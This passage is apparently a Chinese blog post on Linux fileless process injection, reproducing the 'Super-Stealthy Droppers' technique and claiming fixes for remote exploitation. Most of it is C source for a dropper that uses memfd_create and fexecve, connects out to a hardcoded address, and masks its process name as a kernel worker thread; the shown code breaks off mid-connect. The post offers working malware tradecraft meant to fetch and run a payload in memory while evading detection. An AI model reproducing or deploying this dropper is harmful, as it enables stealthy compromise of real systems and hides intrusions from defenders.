linux无文件进程注入
本文是对 Super-Stealthy Droppers 的复现,测试发现代码有些bug,在远程利用时会问题,稍作完善了下。 memfd_create + fexecve memfd_create需要 kernel 3.17以上,fexecve需要2.3.2以上 #include <stdio.h> #include <stdlib.h> #include <sys/syscall.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #define __NR_memfd_create 319 #define MFD_CLOEXEC 1 static inline int memfd_create( const char *name, unsigned int flags) { return syscall(__NR_memfd_create, name, flags); } extern char **environ; int main ( int argc, char **argv) { int fd, s; unsigned long addr = 0x0100007f11110002 ; char *args[ 2 ]= { "[kworker/u!0]" , NULL}; char buf[ 1024 ]; int num; // Connect if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0 ) exit ( 1 ); if (connect (s, (struc